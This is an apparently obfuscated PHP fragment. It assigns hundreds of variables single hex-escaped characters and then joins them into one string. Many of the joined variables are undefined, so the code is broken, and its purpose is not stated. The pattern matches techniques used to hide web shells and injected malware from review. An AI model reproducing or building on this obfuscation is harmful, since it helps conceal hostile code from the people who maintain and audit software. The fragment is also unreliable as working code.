$bijr178="\x69";$bijr484="\x77";$bijr1538="\x65";$bijr11="\x6c";$bijr681="\x64";$bijr1499="\x63";$bijr304="\x63";$bijr1214="\x20";$bijr795="\x09";$bijr807="\x6c";$bijr815="\x6c";$bijr1021="\x20";$bijr1683="\x3d";$bijr1075="\x3b";$bijr1526="\x20";$bijr802="\x63";$bijr1126="\x09";$bijr1662="\x6e";$bijr1216="\x69";$bijr932="\x2e";$bijr1541="\x68";$bijr564="\x24";
$bijr151="\x0a";$bijr1160="\x20";
$bijr1164="\x31";$bijr1250="\x20";$bijr570="\x3b";
$bijr405="\x2c";$bijr1622="\x22";$bijr40="\x43";$bijr803="\x61";$bijr1543="\x20";$bijr1439="\x72";$bijr281="\x63";$bijr968="\x20";$bijr578="\x6e";$bijr987="\x2e";$bijr917="\x24";$bijr210="\x73";$bijr1456="\x0a";$bijr260="\x61";$bijr836="\x20";$bijr1495="\x6e";$bijr704="\x61";$bijr520="\x69";$bijr1388="\x0a";$bijr318="\x20";$bijr1312="\x09";
$bijr589="\x5f";$bijr1591="\x61";$bijr1009="\x3b";$bijr870="\x3c";$bijr360="\x73";$bijr1398="\x20";
$bijr131="\x65";$bijr746="\x63";
$bijr1564="\x6e";$bijr515="\x65";$bijr776="\x6e";
$bijr722="\x20";
$bijr1617="\x65";$bijr893="\x6d";$bijr1114="\x73";
$bijr1036="\x6e";$bijr1434="\x0a";
$bijr409="\x3b";$bijr1103="\x66";$bijr440="\x79";$bijr1406="\x6e";$bijr359="\x40";$bijr399="\x6e";$bijr765="\x69";
$bijr428="\x20";$bijr642="\x69";$bijr183="\x3b";
$bijr149="\x70";$bijr430="\x63";$bijr96="\x20";$bijr313="\x72";$bijr1663="\x74";$bijr545="\x69";$bijr820="\x74";$bijr1087="\x24";$bijr882="\x2b";$bijr291="\x68";$bijr1609="\x20";$bijr57="\x20";$bijr83="\x6e";
$bijr1598="\x24";$bijr1477="\x20";$bijr432="\x69";$bijr1559="\x67";$bijr1711="\x6e";
$bijr655="\x09";
$bijr56="\x6e";$bijr1056="\x22";$bijr1387="\x7b";$bijr66="\x23";$bijr1640="\x61";$bijr1554="\x23";$bijr1144="\x5f";
$bijr1556="\x69";$bijr1184="\x3d";$bijr683="\x5c";$bijr612="\x20";$bijr459="\x77";$bijr984="\x64";$bijr1112="\x74";$bijr77="\x65";$bijr671="\x6e";$bijr108="\x72";$bijr415="\x0a";$bijr44="\x30";$bijr793="\x3b";$bijr839="\x24";$bijr1180="\x20";$bijr1419="\x28";
$bijr1062="\x5c";$bijr611="\x3d";$bijr413="\x0a";$bijr1574="\x74";$bijr152="\x7b";
$bijr607="\x6f";$bijr689="\x30";$bijr737="\x5d";$bijr502="\x72";$bijr1109="\x5f";$bijr1660="\x72";$bijr1051="\x65";$bijr1297="\x20";$bijr1133="\x31";$bijr1532="\x2c";
$bijr244="\x69";$bijr1665="\x4f";$bijr606="\x63";$bijr1580="\x29";$bijr1280="\x2c";$bijr563="\x09";$bijr1020="\x65";
$bijr466="\x75";$bijr897="\x65";
$bijr911="\x61";$bijr211="\x20";$bijr1115="\x5f";
$bijr842="\x61";$bijr1313="\x6d";$bijr1002="\x6d";$bijr1511="\x65";$bijr17="\x20";$bijr68="\x63";$bijr485="\x65";$bijr1308="\x67";$bijr581="\x65";$bijr1172="\x29";$bijr955="\x72";$bijr160="\x6f";$bijr1255="\x0a";$bijr1166="\x20";$bijr901="\x20";$bijr1334="\x32";$bijr819="\x73";$bijr1026="\x5c";
$bijr1714="\x0a";$bijr813="\x76";$bijr1449="\x72";
$bijr1414="\x2c";$bijr345="\x2b";$bijr1207="\x6e";
$bijr1232="\x24";$bijr1011="\x3b";
$bijr63="\x65";
$bijr1520="\x61";
$bijr919="\x2e";$bijr1225="\x09";
$bijr837="\x22";$bijr435="\x20";$bijr1621="\x2c";$bijr849="\x3d";$bijr1513="\x34";$bijr1089="\x63";$bijr1570="\x6f";$bijr453="\x20";$bijr18="\x63";$bijr1340="\x20";
$bijr531="\x5f";$bijr1713="\x3b";
$bijr1450="\x69";$bijr1240="\x3d";$bijr894="\x63";$bijr344="\x2b";$bijr1498="\x20";
$bijr980="\x24";
$bijr906="\x76";$bijr1212="\x69";$bijr46="\x39";$bijr1657="\x3b";$bijr1096="\x0a";$bijr755="\x5c";
$bijr355="\x75";$bijr998="\x72";$bijr1596="\x68";$bijr1550="\x69";$bijr1067="\x72";$bijr1690="\x2b";$bijr43="\x32";$bijr1531="\x6f";$bijr928="\x6f";
$bijr890="\x09";$bijr87="\x76";$bijr1633="\x2d";
$bijr1271="\x3d";$bijr1444="\x6e";$bijr254="\x62";$bijr1069="\x6e";$bijr676="\x5c";$bijr910="\x6e";
$bijr150="\x68";$bijr438="\x72";$bijr824="\x67";$bijr930="\x65";$bijr257="\x6c";$bijr647="\x2b";$bijr1151="\x20";$bijr1638="\x5f";
$bijr1431="\x29";$bijr781="\x29";$bijr282="\x74";$bijr1624="\x6d";
$bijr1707="\x61";$bijr1412="\x63";$bijr549="\x20";$bijr690="\x32";$bijr1333="\x2b";$bijr931="\x20";$bijr769="\x28";$bijr1355="\x09";$bijr764="\x24";$bijr261="\x6e";$bijr614="\x22";$bijr174="\x6d";
$bijr691="\x78";$bijr552="\x69";
$bijr938="\x22";$bijr1696="\x65";$bijr861="\x20";$bijr249="\x0a";
$bijr557="\x65";
$bijr220="\x73";$bijr50="\x62";$bijr483="\x20";
$bijr99="\x6c";$bijr1262="\x5b";
$bijr860="\x69";$bijr1195="\x24";
$bijr22="\x20";$bijr767="\x25";$bijr1519="\x72";$bijr1579="\x3a";
$bijr153="\x0a";$bijr939="\x20";$bijr601="\x6d";$bijr98="\x6c";
$bijr1603="\x0a";$bijr243="\x74";$bijr308="\x74";$bijr1246="\x5b";$bijr425="\x69";$bijr1639="\x6e";$bijr1173="\x20";$bijr1549="\x73";$bijr206="\x64";$bijr730="\x72";$bijr1253="\x5d";
$bijr1219="\x3d";$bijr154="\x09";$bijr494="\x75";$bijr1012="\x0a";$bijr1198="\x2b";$bijr1003="\x65";$bijr762="\x28";$bijr1163="\x61";$bijr1013="\x0a";$bijr1223="\x3b";$bijr1416="\x69";$bijr1482="\x2c";$bijr1101="\x62";$bijr772="\x74";$bijr32="\x65";$bijr242="\x61";$bijr1386="\x20";$bijr1611="\x6e";$bijr1697="\x72";$bijr735="\x24";$bijr1581="\x0a";$bijr586="\x61";$bijr1153="\x6d";$bijr1046="\x24";$bijr513="\x61";$bijr404="\x73";$bijr725="\x64";$bijr9="\x61";$bijr848="\x65";$bijr1097="\x0a";$bijr277="\x68";
$bijr1695="\x6e";$bijr275="\x20";$bijr944="\x28";$bijr628="\x30";$bijr1247="\x24";$bijr268="\x20";$bijr1572="\x65";$bijr1565="\x67";$bijr763="\x28";$bijr121="\x20";$bijr916="\x22";$bijr1029="\x3d";
$bijr1656="\x29";$bijr560="\x3b";$bijr675="\x22";$bijr1102="\x20";$bijr521="\x73";$bijr45="\x30";$bijr481="\x73";$bijr100="\x20";$bijr1480="\x64";$bijr448="\x74";$bijr214="\x28";$bijr503="\x65";$bijr465="\x68";$bijr1568="\x78";$bijr934="\x20";$bijr1296="\x62";$bijr1065="\x76";$bijr1277="\x5b";$bijr1132="\x61";$bijr646="\x20";
$bijr489="\x6e";$bijr338="\x6f";$bijr230="\x28";$bijr597="\x29";
$bijr1445="\x20";$bijr1136="\x24";$bijr1379="\x3b";$bijr639="\x73";$bijr1405="\x69";
$bijr992="\x24";$bijr575="\x61";$bijr=$bijr0.
$bijr1.$bijr2.$bijr3.$bijr4.$bijr5.$bijr6.$bijr7.$bijr8.$bijr9.$bijr10.$bijr11.$bijr12.$bijr13.$bijr14.$bijr15.$bijr16.$bijr17.$bijr18.
$bijr19.$bijr20.$bijr21.
$bijr22.
$bijr23.$bijr24.
$bijr25.$bijr26.$bijr27.$bijr28.
$bijr29.
$bijr30.
$bijr31.$bijr32.$bijr33.$bijr34.$bijr35.$bijr36.$bijr37.$bijr38.$bijr39.$bijr40.$bijr41.$bijr42.
$bijr43.$bijr44.$bijr45.$bijr46.$bijr47.
$bijr48.$bijr49.$bijr50.
$bijr51.$bijr52.
$bijr53.$bijr54.$bijr55.$bijr56.$bijr57.$bijr58.$bijr59.$bijr60.
$bijr61.
$bijr62.$bijr63.$bijr64.$bijr65.$bijr66.
$bijr67.$bijr68.$bijr69.$bijr70.$bijr71.$bijr72.$bijr73.$bijr74.$bijr75.$bijr76.$bijr77.$bijr78.$bijr79.$bijr80.$bijr81.$bijr82.
$bijr83.$bijr84.$bijr85.
$bijr86.$bijr87.$bijr88.$bijr89.$bijr90.
$bijr91.
$bijr92.$bijr93.$bijr94.
$bijr95.$bijr96.
$bijr97.$bijr98.$bijr99.$bijr100.$bijr101.$bijr102.
$bijr103.$bijr104.$bijr105.$bijr106.$bijr107.$bijr108.
$bijr109.$bijr110.$bijr111.$bijr112.
$bijr113.
$bijr114.$bijr115.$bijr116.$bijr117.$bijr118.$bijr119.$bijr120.
$bijr121.$bijr122.$bijr123.$bijr124.
$bijr125.$bijr126.$bijr127.$bijr128.$bijr129.$bijr130.$bijr131.$bijr132.$bijr133.$bijr134.$bijr135.$bijr136.
$bijr137.$bijr138.$bijr139.$bijr140.$bijr141.$bijr142.$bijr143.$bijr144.
$bijr145.$bijr146.$bijr147.
$bijr148.$bijr149.$bijr150.$bijr151.$bijr152.
$bijr153.$bijr154.$bijr155.$bijr156.$bijr157.$bijr158.$bijr159.$bijr160.$bijr161.$bijr162.$bijr163.$bijr164.$bijr165.$bijr166.$bijr167.$bijr168.$bijr169.$bijr170.$bijr171.$bijr172.$bijr173.$bijr174.$bijr175.$bijr176.$bijr177.$bijr178.$bijr179.$bijr180.$bijr181.$bijr182.$bijr183.$bijr184.$bijr185.$bijr186.
$bijr187.$bijr188.$bijr189.$bijr190.$bijr191.$bijr192.$bijr193.$bijr194.$bijr195.
$bijr196.$bijr197.$bijr198.
$bijr199.$bijr200.$bijr201.$bijr202.$bijr203.$bijr204.$bijr205.$bijr206.$bijr207.$bijr208.$bijr209.$bijr210.$bijr211.$bijr212.$bijr213.$bijr214.$bijr215.
$bijr216.
$bijr217.
$bijr218.$bijr219.$bijr220.
$bijr221.$bijr222.$bijr223.$bijr224.$bijr225.$bijr226.$bijr227.$bijr228.$bijr229.$bijr230.$bijr231.$bijr232.$bijr233.$bijr234.
$bijr235.$bijr236.$bijr237.$bijr238.$bijr239.$bijr240.
$bijr241.$bijr242.$bijr243.$bijr244.$bijr245.$bijr246.$bijr247.$bijr248.$bijr249.$bijr250.$bijr251.$bijr252.$bijr253.$bijr254.$bijr255.$bijr256.$bijr257.$bijr258.$bijr259.
$bijr260.$bijr261.
$bijr262.$bijr263.$bijr264.
$bijr265.$bijr266.$bijr267.
$bijr268.$bijr269.$bijr270.$bijr271.$bijr272.
$bijr273.$bijr274.$bijr275.$bijr276.$bijr277.$bijr278.$bijr279.$bijr280.
$bijr281.$bijr282.$bijr283.$bijr284.$bijr285.$bijr286.$bijr287.$bijr288.
$bijr289.$bijr290.$bijr291.$bijr292.$bijr293.$bijr294.$bijr295.$bijr296.$bijr297.$bijr298.$bijr299.
$bijr300.$bijr301.$bijr302.$bijr303.$bijr304.$bijr305.$bijr306.
$bijr307.$bijr308.$bijr309.$bijr310.$bijr311.
$bijr312.$bijr313.$bijr314.$bijr315.$bijr316.$bijr317.$bijr318.$bijr319.$bijr320.$bijr321.$bijr322.$bijr323.$bijr324.
$bijr325.$bijr326.$bijr327.$bijr328.$bijr329.$bijr330.$bijr331.$bijr332.$bijr333.$bijr334.$bijr335.$bijr336.
$bijr337.$bijr338.$bijr339.$bijr340.
$bijr341.$bijr342.
$bijr343.$bijr344.$bijr345.$bijr346.
$bijr347.$bijr348.$bijr349.$bijr350.
$bijr351.$bijr352.
$bijr353.$bijr354.$bijr355.$bijr356.
$bijr357.
$bijr358.$bijr359.$bijr360.
$bijr361.$bijr362.$bijr363.$bijr364.$bijr365.$bijr366.$bijr367.$bijr368.$bijr369.$bijr370.
$bijr371.$bijr372.$bijr373.$bijr374.$bijr375.$bijr376.$bijr377.$bijr378.$bijr379.$bijr380.$bijr381.$bijr382.$bijr383.$bijr384.$bijr385.$bijr386.$bijr387.$bijr388.$bijr389.$bijr390.$bijr391.$bijr392.$bijr393.
$bijr394.$bijr395.$bijr396.
$bijr397.$bijr398.$bijr399.
$bijr400.$bijr401.$bijr402.
$bijr403.$bijr404.$bijr405.$bijr406.$bijr407.$bijr408.$bijr409.$bijr410.$bijr411.$bijr412.$bijr413.$bijr414.
$bijr415.$bijr416.$bijr417.
$bijr418.$bijr419.$bijr420.$bijr421.$bijr422.$bijr423.$bijr424.$bijr425.$bijr426.$bijr427.$bijr428.$bijr429.
$bijr430.
$bijr431.$bijr432.
$bijr433.$bijr434.$bijr435.$bijr436.$bijr437.$bijr438.$bijr439.$bijr440.
$bijr441.$bijr442.$bijr443.$bijr444.$bijr445.$bijr446.$bijr447.$bijr448.
$bijr449.$bijr450.$bijr451.$bijr452.$bijr453.$bijr454.$bijr455.$bijr456.$bijr457.$bijr458.
$bijr459.$bijr460.$bijr461.$bijr462.$bijr463.$bijr464.$bijr465.$bijr466.$bijr467.$bijr468.
$bijr469.$bijr470.$bijr471.$bijr472.$bijr473.$bijr474.$bijr475.$bijr476.
$bijr477.$bijr478.$bijr479.$bijr480.
$bijr481.$bijr482.$bijr483.
$bijr484.
$bijr485.
$bijr486.$bijr487.$bijr488.$bijr489.$bijr490.$bijr491.$bijr492.
$bijr493.$bijr494.$bijr495.
$bijr496.$bijr497.$bijr498.$bijr499.$bijr500.
$bijr501.$bijr502.
$bijr503.$bijr504.
$bijr505.$bijr506.
$bijr507.
$bijr508.$bijr509.$bijr510.
$bijr511.$bijr512.$bijr513.$bijr514.$bijr515.$bijr516.$bijr517.
$bijr518.$bijr519.$bijr520.$bijr521.$bijr522.$bijr523.$bijr524.$bijr525.
$bijr526.$bijr527.$bijr528.$bijr529.$bijr530.$bijr531.
$bijr532.
$bijr533.$bijr534.
$bijr535.$bijr536.$bijr537.$bijr538.
$bijr539.$bijr540.
$bijr541.$bijr542.
$bijr543.$bijr544.$bijr545.
$bijr546.$bijr547.$bijr548.$bijr549.$bijr550.$bijr551.$bijr552.$bijr553.$bijr554.$bijr555.$bijr556.$bijr557.$bijr558.
$bijr559.$bijr560.$bijr561.$bijr562.$bijr563.$bijr564.$bijr565.$bijr566.$bijr567.$bijr568.$bijr569.$bijr570.$bijr571.$bijr572.$bijr573.$bijr574.$bijr575.$bijr576.$bijr577.$bijr578.$bijr579.$bijr580.$bijr581.$bijr582.$bijr583.$bijr584.$bijr585.$bijr586.$bijr587.$bijr588.$bijr589.$bijr590.
$bijr591.
$bijr592.
$bijr593.$bijr594.
$bijr595.$bijr596.
$bijr597.
$bijr598.$bijr599.$bijr600.$bijr601.$bijr602.$bijr603.$bijr604.
$bijr605.$bijr606.$bijr607.$bijr608.$bijr609.$bijr610.$bijr611.$bijr612.$bijr613.$bijr614.$bijr615.$bijr616.
$bijr617.$bijr618.$bijr619.$bijr620.$bijr621.$bijr622.
$bijr623.$bijr624.
$bijr625.$bijr626.$bijr627.$bijr628.$bijr629.$bijr630.$bijr631.$bijr632.$bijr633.$bijr634.$bijr635.
$bijr636.$bijr637.$bijr638.
$bijr639.$bijr640.
$bijr641.$bijr642.$bijr643.$bijr644.$bijr645.$bijr646.$bijr647.$bijr648.$bijr649.$bijr650.$bijr651.$bijr652.$bijr653.$bijr654.$bijr655.$bijr656.
$bijr657.$bijr658.$bijr659.$bijr660.$bijr661.
$bijr662.
$bijr663.$bijr664.$bijr665.
$bijr666.$bijr667.$bijr668.$bijr669.$bijr670.$bijr671.$bijr672.$bijr673.$bijr674.$bijr675.
$bijr676.$bijr677.$bijr678.$bijr679.$bijr680.$bijr681.
$bijr682.$bijr683.$bijr684.
$bijr685.$bijr686.$bijr687.$bijr688.$bijr689.$bijr690.$bijr691.$bijr692.$bijr693.$bijr694.$bijr695.$bijr696.$bijr697.
$bijr698.$bijr699.$bijr700.
$bijr701.$bijr702.$bijr703.$bijr704.$bijr705.$bijr706.$bijr707.$bijr708.$bijr709.$bijr710.$bijr711.$bijr712.$bijr713.$bijr714.$bijr715.
$bijr716.$bijr717.$bijr718.$bijr719.$bijr720.
$bijr721.$bijr722.$bijr723.$bijr724.$bijr725.$bijr726.$bijr727.$bijr728.
$bijr729.$bijr730.
$bijr731.$bijr732.$bijr733.$bijr734.$bijr735.
$bijr736.
$bijr737.$bijr738.$bijr739.$bijr740.$bijr741.$bijr742.
$bijr743.$bijr744.$bijr745.$bijr746.$bijr747.$bijr748.$bijr749.$bijr750.$bijr751.$bijr752.$bijr753.$bijr754.$bijr755.$bijr756.
$bijr757.$bijr758.$bijr759.$bijr760.
$bijr761.$bijr762.$bijr763.$bijr764.$bijr765.$bijr766.$bijr767.$bijr768.
$bijr769.$bijr770.
$bijr771.$bijr772.$bijr773.$bijr774.
$bijr775.$bijr776.$bijr777.$bijr778.$bijr779.$bijr780.$bijr781.$bijr782.$bijr783.
$bijr784.$bijr785.$bijr786.
$bijr787.$bijr788.$bijr789.$bijr790.$bijr791.$bijr792.$bijr793.$bijr794.$bijr795.$bijr796.$bijr797.$bijr798.$bijr799.$bijr800.
$bijr801.
$bijr802.$bijr803.$bijr804.$bijr805.$bijr806.$bijr807.$bijr808.
$bijr809.$bijr810.
$bijr811.$bijr812.$bijr813.$bijr814.$bijr815.$bijr816.
$bijr817.$bijr818.
$bijr819.$bijr820.
$bijr821.$bijr822.$bijr823.$bijr824.$bijr825.$bijr826.
$bijr827.$bijr828.$bijr829.$bijr830.
$bijr831.$bijr832.$bijr833.$bijr834.$bijr835.$bijr836.$bijr837.
$bijr838.$bijr839.$bijr840.
$bijr841.$bijr842.$bijr843.$bijr844.$bijr845.$bijr846.$bijr847.
$bijr848.$bijr849.$bijr850.$bijr851.$bijr852.$bijr853.
$bijr854.
$bijr855.$bijr856.$bijr857.$bijr858.$bijr859.$bijr860.$bijr861.$bijr862.$bijr863.$bijr864.
$bijr865.$bijr866.$bijr867.
$bijr868.$bijr869.$bijr870.$bijr871.$bijr872.$bijr873.$bijr874.$bijr875.$bijr876.
$bijr877.$bijr878.$bijr879.$bijr880.
$bijr881.$bijr882.$bijr883.$bijr884.$bijr885.$bijr886.
$bijr887.$bijr888.
$bijr889.$bijr890.
$bijr891.$bijr892.$bijr893.$bijr894.$bijr895.$bijr896.$bijr897.$bijr898.$bijr899.$bijr900.
$bijr901.$bijr902.$bijr903.$bijr904.$bijr905.$bijr906.$bijr907.$bijr908.$bijr909.$bijr910.
$bijr911.$bijr912.$bijr913.$bijr914.$bijr915.
$bijr916.$bijr917.$bijr918.$bijr919.$bijr920.$bijr921.$bijr922.$bijr923.$bijr924.
$bijr925.$bijr926.$bijr927.$bijr928.
$bijr929.
$bijr930.
$bijr931.$bijr932.$bijr933.$bijr934.$bijr935.$bijr936.$bijr937.$bijr938.$bijr939.$bijr940.$bijr941.$bijr942.$bijr943.$bijr944.$bijr945.$bijr946.
$bijr947.$bijr948.$bijr949.$bijr950.$bijr951.$bijr952.$bijr953.$bijr954.$bijr955.$bijr956.$bijr957.$bijr958.$bijr959.$bijr960.$bijr961.$bijr962.$bijr963.
$bijr964.$bijr965.$bijr966.
$bijr967.$bijr968.$bijr969.$bijr970.
$bijr971.$bijr972.
$bijr973.$bijr974.$bijr975.
$bijr976.$bijr977.$bijr978.
$bijr979.$bijr980.$bijr981.$bijr982.$bijr983.$bijr984.
$bijr985.$bijr986.$bijr987.$bijr988.$bijr989.$bijr990.$bijr991.$bijr992.$bijr993.$bijr994.
$bijr995.$bijr996.$bijr997.$bijr998.$bijr999.$bijr1000.$bijr1001.$bijr1002.$bijr1003.$bijr1004.$bijr1005.
$bijr1006.$bijr1007.$bijr1008.$bijr1009.$bijr1010.$bijr1011.$bijr1012.
$bijr1013.$bijr1014.$bijr1015.$bijr1016.$bijr1017.$bijr1018.$bijr1019.$bijr1020.
$bijr1021.$bijr1022.$bijr1023.$bijr1024.
$bijr1025.$bijr1026.$bijr1027.
$bijr1028.$bijr1029.
$bijr1030.
$bijr1031.$bijr1032.$bijr1033.$bijr1034.$bijr1035.$bijr1036.$bijr1037.$bijr1038.
$bijr1039.$bijr1040.$bijr1041.$bijr1042.$bijr1043.$bijr1044.$bijr1045.$bijr1046.$bijr1047.$bijr1048.$bijr1049.$bijr1050.
$bijr1051.$bijr1052.$bijr1053.$bijr1054.$bijr1055.
$bijr1056.
$bijr1057.$bijr1058.$bijr1059.
$bijr1060.$bijr1061.$bijr1062.$bijr1063.$bijr1064.
$bijr1065.$bijr1066.
$bijr1067.$bijr1068.$bijr1069.$bijr1070.
$bijr1071.$bijr1072.$bijr1073.$bijr1074.$bijr1075.$bijr1076.$bijr1077.$bijr1078.$bijr1079.$bijr1080.
$bijr1081.$bijr1082.$bijr1083.$bijr1084.
$bijr1085.$bijr1086.
$bijr1087.$bijr1088.
$bijr1089.$bijr1090.$bijr1091.$bijr1092.$bijr1093.$bijr1094.$bijr1095.$bijr1096.$bijr1097.$bijr1098.$bijr1099.$bijr1100.$bijr1101.$bijr1102.$bijr1103.$bijr1104.$bijr1105.$bijr1106.$bijr1107.$bijr1108.$bijr1109.$bijr1110.$bijr1111.$bijr1112.$bijr1113.
$bijr1114.$bijr1115.
$bijr1116.$bijr1117.$bijr1118.
$bijr1119.$bijr1120.
$bijr1121.$bijr1122.$bijr1123.$bijr1124.$bijr1125.$bijr1126.$bijr1127.$bijr1128.$bijr1129.
$bijr1130.$bijr1131.$bijr1132.
$bijr1133.$bijr1134.
$bijr1135.
$bijr1136.$bijr1137.$bijr1138.$bijr1139.$bijr1140.$bijr1141.$bijr1142.$bijr1143.$bijr1144.
$bijr1145.$bijr1146.$bijr1147.$bijr1148.
$bijr1149.$bijr1150.$bijr1151.$bijr1152.
$bijr1153.$bijr1154.$bijr1155.$bijr1156.$bijr1157.$bijr1158.$bijr1159.$bijr1160.$bijr1161.
$bijr1162.$bijr1163.$bijr1164.$bijr1165.$bijr1166.$bijr1167.$bijr1168.
$bijr1169.$bijr1170.$bijr1171.$bijr1172.$bijr1173.$bijr1174.$bijr1175.$bijr1176.$bijr1177.$bijr1178.$bijr1179.$bijr1180.$bijr1181.$bijr1182.$bijr1183.$bijr1184.$bijr1185.$bijr1186.$bijr1187.$bijr1188.$bijr1189.$bijr1190.
$bijr1191.$bijr1192.$bijr1193.$bijr1194.$bijr1195.$bijr1196.$bijr1197.$bijr1198.$bijr1199.$bijr1200.
$bijr1201.$bijr1202.$bijr1203.$bijr1204.
$bijr1205.$bijr1206.$bijr1207.$bijr1208.$bijr1209.$bijr1210.$bijr1211.$bijr1212.$bijr1213.$bijr1214.$bijr1215.$bijr1216.$bijr1217.$bijr1218.
$bijr1219.$bijr1220.
$bijr1221.$bijr1222.
$bijr1223.$bijr1224.
$bijr1225.$bijr1226.
$bijr1227.$bijr1228.$bijr1229.$bijr1230.$bijr1231.$bijr1232.$bijr1233.$bijr1234.
$bijr1235.
$bijr1236.
$bijr1237.$bijr1238.$bijr1239.
$bijr1240.$bijr1241.$bijr1242.
$bijr1243.$bijr1244.
$bijr1245.$bijr1246.$bijr1247.$bijr1248.$bijr1249.$bijr1250.$bijr1251.$bijr1252.$bijr1253.$bijr1254.
$bijr1255.$bijr1256.
$bijr1257.$bijr1258.$bijr1259.$bijr1260.
$bijr1261.$bijr1262.$bijr1263.$bijr1264.$bijr1265.$bijr1266.$bijr1267.$bijr1268.
$bijr1269.$bijr1270.
$bijr1271.$bijr1272.
$bijr1273.$bijr1274.$bijr1275.$bijr1276.$bijr1277.$bijr1278.$bijr1279.$bijr1280.
$bijr1281.$bijr1282.$bijr1283.$bijr1284.$bijr1285.$bijr1286.$bijr1287.
$bijr1288.
$bijr1289.$bijr1290.
$bijr1291.$bijr1292.$bijr1293.$bijr1294.$bijr1295.$bijr1296.
$bijr1297.$bijr1298.$bijr1299.$bijr1300.$bijr1301.$bijr1302.
$bijr1303.$bijr1304.$bijr1305.$bijr1306.$bijr1307.$bijr1308.$bijr1309.$bijr1310.
$bijr1311.$bijr1312.$bijr1313.$bijr1314.
$bijr1315.$bijr1316.$bijr1317.$bijr1318.
$bijr1319.$bijr1320.
$bijr1321.$bijr1322.$bijr1323.$bijr1324.$bijr1325.$bijr1326.$bijr1327.$bijr1328.$bijr1329.$bijr1330.$bijr1331.$bijr1332.
$bijr1333.$bijr1334.
$bijr1335.$bijr1336.$bijr1337.$bijr1338.$bijr1339.$bijr1340.$bijr1341.$bijr1342.$bijr1343.$bijr1344.
$bijr1345.$bijr1346.$bijr1347.
$bijr1348.$bijr1349.$bijr1350.
$bijr1351.$bijr1352.$bijr1353.$bijr1354.$bijr1355.$bijr1356.$bijr1357.$bijr1358.$bijr1359.$bijr1360.$bijr1361.$bijr1362.
$bijr1363.$bijr1364.$bijr1365.
$bijr1366.$bijr1367.$bijr1368.$bijr1369.$bijr1370.
$bijr1371.$bijr1372.$bijr1373.$bijr1374.$bijr1375.$bijr1376.$bijr1377.$bijr1378.$bijr1379.$bijr1380.$bijr1381.$bijr1382.
$bijr1383.$bijr1384.$bijr1385.$bijr1386.
$bijr1387.$bijr1388.$bijr1389.$bijr1390.$bijr1391.$bijr1392.
$bijr1393.$bijr1394.$bijr1395.$bijr1396.$bijr1397.$bijr1398.
$bijr1399.
$bijr1400.
$bijr1401.
$bijr1402.$bijr1403.$bijr1404.$bijr1405.$bijr1406.$bijr1407.$bijr1408.
$bijr1409.$bijr1410.
$bijr1411.$bijr1412.$bijr1413.$bijr1414.$bijr1415.$bijr1416.
$bijr1417.$bijr1418.$bijr1419.$bijr1420.
$bijr1421.$bijr1422.$bijr1423.$bijr1424.
$bijr1425.$bijr1426.$bijr1427.$bijr1428.$bijr1429.$bijr1430.$bijr1431.$bijr1432.$bijr1433.$bijr1434.$bijr1435.$bijr1436.$bijr1437.$bijr1438.$bijr1439.$bijr1440.
$bijr1441.$bijr1442.$bijr1443.$bijr1444.
$bijr1445.$bijr1446.$bijr1447.$bijr1448.$bijr1449.
$bijr1450.$bijr1451.$bijr1452.
$bijr1453.$bijr1454.$bijr1455.
$bijr1456.$bijr1457.$bijr1458.$bijr1459.$bijr1460.$bijr1461.$bijr1462.
$bijr1463.$bijr1464.
$bijr1465.$bijr1466.$bijr1467.$bijr1468.$bijr1469.$bijr1470.
$bijr1471.$bijr1472.$bijr1473.$bijr1474.
$bijr1475.
$bijr1476.$bijr1477.$bijr1478.
$bijr1479.$bijr1480.$bijr1481.$bijr1482.$bijr1483.$bijr1484.
$bijr1485.$bijr1486.$bijr1487.$bijr1488.
$bijr1489.$bijr1490.$bijr1491.$bijr1492.$bijr1493.$bijr1494.$bijr1495.
$bijr1496.$bijr1497.$bijr1498.$bijr1499.$bijr1500.$bijr1501.$bijr1502.$bijr1503.$bijr1504.$bijr1505.$bijr1506.$bijr1507.$bijr1508.$bijr1509.$bijr1510.$bijr1511.$bijr1512.$bijr1513.$bijr1514.$bijr1515.$bijr1516.$bijr1517.$bijr1518.$bijr1519.$bijr1520.
$bijr1521.$bijr1522.$bijr1523.$bijr1524.$bijr1525.$bijr1526.$bijr1527.$bijr1528.$bijr1529.$bijr1530.$bijr1531.$bijr1532.$bijr1533.$bijr1534.
$bijr1535.$bijr1536.
$bijr1537.$bijr1538.$bijr1539.$bijr1540.
$bijr1541.$bijr1542.$bijr1543.$bijr1544.$bijr1545.$bijr1546.$bijr1547.$bijr1548.
$bijr1549.$bijr1550.$bijr1551.
$bijr1552.
$bijr1553.$bijr1554.
$bijr1555.$bijr1556.
$bijr1557.
$bijr1558.$bijr1559.$bijr1560.
$bijr1561.$bijr1562.$bijr1563.$bijr1564.$bijr1565.$bijr1566.$bijr1567.$bijr1568.$bijr1569.$bijr1570.$bijr1571.$bijr1572.$bijr1573.$bijr1574.$bijr1575.$bijr1576.$bijr1577.$bijr1578.
$bijr1579.$bijr1580.$bijr1581.$bijr1582.
$bijr1583.$bijr1584.
$bijr1585.$bijr1586.
$bijr1587.
$bijr1588.$bijr1589.$bijr1590.
$bijr1591.$bijr1592.$bijr1593.$bijr1594.$bijr1595.
$bijr1596.
$bijr1597.$bijr1598.$bijr1599.$bijr1600.$bijr1601.$bijr1602.
$bijr1603.$bijr1604.$bijr1605.$bijr1606.$bijr1607.$bijr1608.
$bijr1609.$bijr1610.$bijr1611.
$bijr1612.
$bijr1613.$bijr1614.
$bijr1615.$bijr1616.$bijr1617.$bijr1618.$bijr1619.$bijr1620.$bijr1621.$bijr1622.$bijr1623.$bijr1624.$bijr1625.
$bijr1626.
$bijr1627.$bijr1628.$bijr1629.
$bijr1630.$bijr1631.$bijr1632.$bijr1633.$bijr1634.
$bijr1635.$bijr1636.$bijr1637.$bijr1638.$bijr1639.$bijr1640.
$bijr1641.$bijr1642.$bijr1643.$bijr1644.
$bijr1645.$bijr1646.$bijr1647.$bijr1648.
$bijr1649.$bijr1650.$bijr1651.$bijr1652.$bijr1653.$bijr1654.$bijr1655.$bijr1656.
$bijr1657.$bijr1658.$bijr1659.$bijr1660.$bijr1661.$bijr1662.$bijr1663.$bijr1664.
$bijr1665.$bijr1666.
$bijr1667.$bijr1668.
$bijr1669.$bijr1670.
$bijr1671.
$bijr1672.$bijr1673.$bijr1674.
$bijr1675.$bijr1676.$bijr1677.$bijr1678.$bijr1679.$bijr1680.$bijr1681.$bijr1682.
$bijr1683.
$bijr1684.$bijr1685.$bijr1686.$bijr1687.$bijr1688.$bijr1689.$bijr1690.
$bijr1691.$bijr1692.$bijr1693.$bijr1694.$bijr1695.$bijr1696.
$bijr1697.
